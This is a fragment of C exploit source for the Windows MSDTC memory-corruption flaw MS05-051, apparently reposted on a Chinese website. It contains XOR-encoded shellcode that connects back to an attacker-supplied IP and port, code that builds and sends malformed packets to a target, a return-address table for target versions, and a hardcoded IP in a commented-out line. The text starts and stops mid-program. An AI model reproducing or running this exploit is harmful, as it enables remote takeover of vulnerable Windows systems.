Microsoft Windows MSDTC内存破坏漏洞(MS05-051)…

(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00, (char)0x00,
(char)0x00, (char)0x00, (char)0x00, (char)0x00 };

#define ip_offset (213 22)
#define port_offset (208 22)
unsigned char realsc[] =
"\xEB\x0F\x5B\x33\xC9\x66\xb9\xaa\x04\x80\x33\x99\x43\xE2\xFA\xEB"
"\x05\xE8\xEC\xFF\xFF\xFF"
"\x70\x6D\x99\x99\x99\xC3\x21\x95\x69\x64\xE6\x12\x99\x12\xE9\x85"
"\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x9A\x6A\x12\xEF\xE1\x9A\x6A"
"\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6\x9A"
"\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D\xDC"
"\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A\x58"
"\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58\x12"
"\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0\x71"
"\xE9\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41\xF3"
"\x9B\xC0\x71\xC4\x99\x99\x99\x1A\x75\xDD\x12\x6D\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B\x66\xCE\x61\x12"
"\x41\x10\xC7\xA1\x10\xC7\xA5\x10\xC7\xD9\xFF\x5E\xDF\xB5\x98\x98"
"\x14\xDE\x89\xC9\xCF\xAA\x59\xC9\xC9\xC9\xF3\x98\xC9\xC9\x14\xCE"
"\xA5\x5E\x9B\xFA\xF4\xFD\x99\xCB\xC9\x66\xCE\x75\x5E\x9E\x9B\x99"
"\x9E\x24\x5E\xDE\x9D\xE6\x99\x99\x98\xF3\x89\xCE\xCA\x66\xCE\x65"
"\xC9\x66\xCE\x69\xAA\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66"
"\x4B\xC3\xC0\x32\x7B\x77\xAA\x59\x5A\x71\x9E\x66\x66\x66\xDE\xFC"
"\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC"
"\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED"
"\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xD5\xF6\xF8\xFD\xD5\xF0\xFB\xEB"
"\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6\xAA\xAB\x99\xCE\xCA\xD8\xCA"
"\xF6\xFA\xF2\xFC\xED\xD8\x99\xFA\xF6\xF7\xF7\xFC\xFA\xED\x99";

struct ostype
{
DWORD TopSEH;
char description[255];
};
ostype OS[] = {
{0x684191c4, "Write NdrserverCall2 pointer From 0x990058"},
{0x684191c4, "Write NdrserverCall2 pointer From 0x980058"},
{0, NULL}
};

DWORD BaseImage[]={0x990058, 0x980058};

void MakeShell(char *ip, int port)
{
//make shellcode
unsigned short tp = htons(port)^(u_short)0x9999;
unsigned long ti = inet_addr(ip)^0x99999999;
memcpy(&realsc[port_offset], &tp, 2);
memcpy(&realsc[ip_offset], &ti, 4);
}

SOCKET ConnectTo(char *ip, int port)
{
WSADATA wsaData;
SOCKET s;
struct hostent *he;
struct sockaddr_in host;
int nTimeout = 5000;
if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
exit(-1);
}
if((he = gethostbyname(ip)) == 0)
{
printf("Failed resolving '%s'", ip);
exit(-1);
}
host.sin_port = htons(port);
host.sin_family = AF_INET;
host.sin_addr = *((struct in_addr *)he->h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
printf("Failed creating socket");
exit(-1);
}

if ((connect(s, (struct sockaddr *) &host, sizeof(host))) == -1)
{
printf("Failed connecting to host\r\n");
exit(-1);
}
setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char*)&nTimeout,sizeof(nTimeout));
return s;
}

void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}

void WriteFakeLength(DWORD fakelen) //should > 0x22b
{
*(DWORD*)(peer0_1 15*8) = fakelen/2;
}

void BuildShell(char *ip, int port)
{
MakeShell(ip, port);
memcpy(peer0_1 132, realsc, sizeof(realsc));
}

void BuildContext(char*ip, int port)
{
SOCKET s = ConnectTo(ip, port);
//SOCKET s = ConnectTo("202.119.9.191", 2288);
send(s, peer0_0, sizeof(peer0_0), 0);
char buf[5000];
WriteFakeLength(1200);
recv(s, buf, sizeof(buf), 0);
send(s, peer0_1, sizeof(peer0_1), 0);
send(s, peer0_2, sizeof(peer0_2), 0);
memset(buf, 0, sizeof(buf));
recv(s, buf, sizeof(buf), 0);
Disconnect(s);
if(buf[8] != 0x5c)
{
printf("Target not support! Quiting....");
exit(0);
}
Sleep(500);
}

void help(char *n)
{
printf("-=[ SST ]=------------------------------------\n");
printf(" MSDTC Arbitrary Opposite Memory Write Flaw\n");

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有